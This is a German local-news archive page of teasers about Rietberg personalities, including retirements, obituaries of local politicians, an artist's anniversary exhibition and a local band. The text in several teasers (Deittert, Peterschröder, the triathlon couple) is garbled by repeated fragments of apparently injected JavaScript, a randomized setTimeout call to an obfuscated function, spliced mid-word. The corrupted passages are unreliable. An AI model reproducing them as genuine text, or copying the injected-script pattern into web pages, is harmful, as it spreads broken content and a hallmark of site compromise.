Category Archives: Persönlichkeiten Rietberg

Dem Gartenschaupark ein Gesicht gegeben

Er ist der Mann, der dem Gartenschaupark ein Gesicht gegeben hat. Nach mehr als vier Jahrzehnten im Dienst der Stadt Rietberg ist Peter Milsch, Geschäftsführer der Gartenschaupark Rietberg GmbH und Stadtmarketing Rietberg GmbH, nun offiziell in den Ruhestand verabschiedet worden. Bürgermeister Andreas Sunder, Aufsichtsratsvorsitzender beider Gesellschaften, würdigte den 63-Jährigen in einer kleinen Feierstunde im Gartenschaupark

Rietberg trauert um Hubert Deittert (CDU)

Er wollte es immer ganz genau wissen und aus erster Handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and erfahren, was die Menschen bewegt: Der ehemalige Rietberger Bürgermeister Hubert Deittert hatte stets ein Ohr am Bürger – jederzeit. Das war ihm wichtig, das war das, was ihn angetrieben hat. Am Sonntag ist der CDU-Politiker aus

Europa soll weiter zusammenwachsen

Das Goldene Buch der Stadt Rietberg ist um einen internationalen Eintrag reicher: Auf Einladung von Rietbergs Bürgermeister Andreas Sunder hat sich jetzt Jan Kasprowicz mit seiner Signatur in dem Buch verewigt. Kasprowicz ist Bürgermeister der polnischen Gemeinde Gietrzwałd, zu der auch das Dorf Naterki gehört. Zu Naterki bestehen seit fast 30 Jahren freundschaftliche Verbindungen aus

Ein Leben für Kunst und Wissenschaften

Das Lebenswerk eines 90-Jährigen zusammenzufassen ist oft nicht leicht. Erst recht nicht, wenn es um Dr. Wilfried Koch geht – anerkannter Maler, Kunsthistoriker, Graphiker, Musiker, Lehrer, Bildhauer und Belletrist aus Varensell. Anlässlich dessen 90. Geburtstages hat er nun selbst eine Ausstellung zusammengestellt, die im Kunsthaus Rietberg – Museum Wilfried Koch einen Querschnitt seines umfangreichen Schaffens

Ausstellung zum Buch läuft bis Silvester

Ein Heimatbuch der etwas andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Art hat die Rietberger Diplom-Grafikdesignerin Birgit Peterschröder veröffentlicht. Illustrationen aus ihrem Buch sind nun im Rahmen einer Ausstellung zu sehen, die von der Stadt Rietberg unterstützt wird. Das Buch nennt die Künstlerin selbst „eine Momentaufnahme der Stadt und eine Liebeserklärung an meinen

Rietberg trauert um Werner Bohnenkamp

Immer ein fröhliches Lächeln im Gesicht, oft die Pfeife im Mund – so kannten die Rietberger ihren Werner Bohnenkamp. Der stellvertretende Bürgermeister der Stadt Rietberg ist am Dienstag (22. Mai) nach langer schwerer Krankheit im Alter von 71 Jahren verstorben. 39 Jahre war Werner Bohnenkamp für die Freie Wählergemeinschaft (FWG) im Rat der Stadt Rietberg

Neuenkirchener Ehepaar beim Verler Volkstriathlon erfolgreich

Sie haben fast alle bekannten Alpen- und Dolomitenpässe mit ihren Rennrädern erfolgreich befahren, doch flach geht es auch, wie beispielsweise bei der Vätternrundan-Radfernfahrt in Schweden oder der Flandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andernrundfahrt. Seit langen Jahren gehören sie dem RSC-Rietberg an und nehmen in unserer Region unter andom() * 6); if (number1==3){var

Mit „Rietberger Persönlichkeiten“ durch die Stadt

Was war die letzte Gräfin von Kaunitz-Rietberg für eine Frau? Wie hat sie gelebt, und wen hat sie mit der Ernte der 200 Obstbäume im Garten ihres herrschaftlichen Hauses Münte versorgt? Es sind Fragen wie diese, die Ute Merschbrock umtreiben. Sie interessiert sich für Menschen, die vor langer Zeit in der Emsstadt gelebt haben. Welche

Rietberger Kult-Band „Brausepöter“ kehrt nach Hamburg zurück

Genau 34 Jahre ist es her, dass „Brausepöter“ in der Markthalle in Hamburg ihr erstes richtig großes Konzert geben durfte – nun kehrt die Rietberger Kult-Band in die Hansestadt zurück. Im kultigen Underground-Club „Astra Stube“ steht das Trio am Mittwoch Abend auf der Bühne und darf damit ein wenig in der aufregenden Vergangenheit schwelgen. Wir haben

Andreas Göke gibt Taktstock der Musikgemeinschaft in jüngere Hände

Wenn langjährige Ehrenamtler ihre Position abgeben, reißt dies meist ein großes Loch – bei Andreas Göke und der Musikgemeinschaft Rietberger Jäger/Musikfreunde Bokel ist das aber anders. Zwar gab Göke den Dirigtenstab an seinen Nachfolger Martin Preisker (28) weiter, bleibt aber weiterhin am Flügel-Horn vertreten. Dass er musikalisch im Ensemble sicherlich genauso wichtig ist, wie mit dem Taktstock